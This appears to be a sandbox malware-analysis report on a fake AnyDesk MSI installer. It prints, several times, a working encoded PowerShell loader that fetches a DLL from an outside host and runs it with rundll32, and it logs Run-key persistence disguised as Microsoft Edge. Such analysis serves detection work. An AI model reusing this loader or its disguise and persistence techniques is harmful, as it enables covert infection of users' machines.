JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer
      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer
      Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2
      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2
      Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2
      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2
      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 98DB8D4E6DAAAA17E94E76B65ACF188BJump to behavior
      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI5344.tmp "C:\Windows\Installer\MSI5344.tmp" /DontWait /HideWindow powershell.exe -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer Jump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer Jump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2Jump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2
      Source: C:\Windows\Installer\MSI5344.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF1D4225E8A4DE5B08.TMPJump to behavior
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6D5EC0 CoInitialize,CoCreateInstance,VariantInit,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,VariantInit,LocalFree,LocalFree,SysAllocString,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF7AF6D5EC0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6D4D20 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,LocalFree,LocalFree,CloseHandle,Process32NextW,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF7AF6D4D20
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer
      Source: AnydeskSetup_26b30163.msiStatic file information: TRID: Microsoft Windows Installer (77509/1) 52.18%
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5940:120:WilError_01
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: AnydeskSetup_26b30163.msiStatic file information: File size 11544064 > 1048576
      Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdb> source: MSI5344.tmp, 00000003.00000000.334329335.00007FF7AF735000.00000002.00000001.01000000.00000003.sdmp, MSI5344.tmp, 00000003.00000002.336937187.00007FF7AF735000.00000002.00000001.01000000.00000003.sdmp, AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr
      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbb source: AnydeskSetup_26b30163.msi, 4641a8.msi.1.dr
      Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdb source: MSI5344.tmp, 00000003.00000000.334329335.00007FF7AF735000.00000002.00000001.01000000.00000003.sdmp, MSI5344.tmp, 00000003.00000002.336937187.00007FF7AF735000.00000002.00000001.01000000.00000003.sdmp, AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr
      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: AnydeskSetup_26b30163.msi, 4641a8.msi.1.dr
      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: AnydeskSetup_26b30163.msi, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6EF35E push rbp; iretd 3_2_00007FF7AF6EF35F
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6EE1E2 push rbp; iretd 3_2_00007FF7AF6EE1E3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF8160503CA pushad ; iretd 4_2_00007FF8160503CB
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001A90 WTSEnumerateSessionsA,SetErrorMode,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_10001A90
      Source: MSI5344.tmp.1.drStatic PE information: section name: _RDATA

      Persistence and Installation Behavior

      barindex
      Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI5344.tmpJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\435f8fae.datJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\435f8fae.datJump to dropped file
      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI48BD.tmpJump to dropped file
      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI49E8.tmpJump to dropped file
      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4B9F.tmpJump to dropped file
      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI494B.tmpJump to dropped file
      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5344.tmpJump to dropped file
      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4755.tmpJump to dropped file
      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI48BD.tmpJump to dropped file
      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI49E8.tmpJump to dropped file
      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4B9F.tmpJump to dropped file
      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI494B.tmpJump to dropped file
      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5344.tmpJump to dropped file
      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4755.tmpJump to dropped file
      Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_074112c558cd4b6f62f9637e863e9916Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_074112c558cd4b6f62f9637e863e9916Jump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: c:\users\user\desktop\anydesksetup_26b30163.msiJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001A90 WTSEnumerateSessionsA,SetErrorMode,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_10001A90
      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
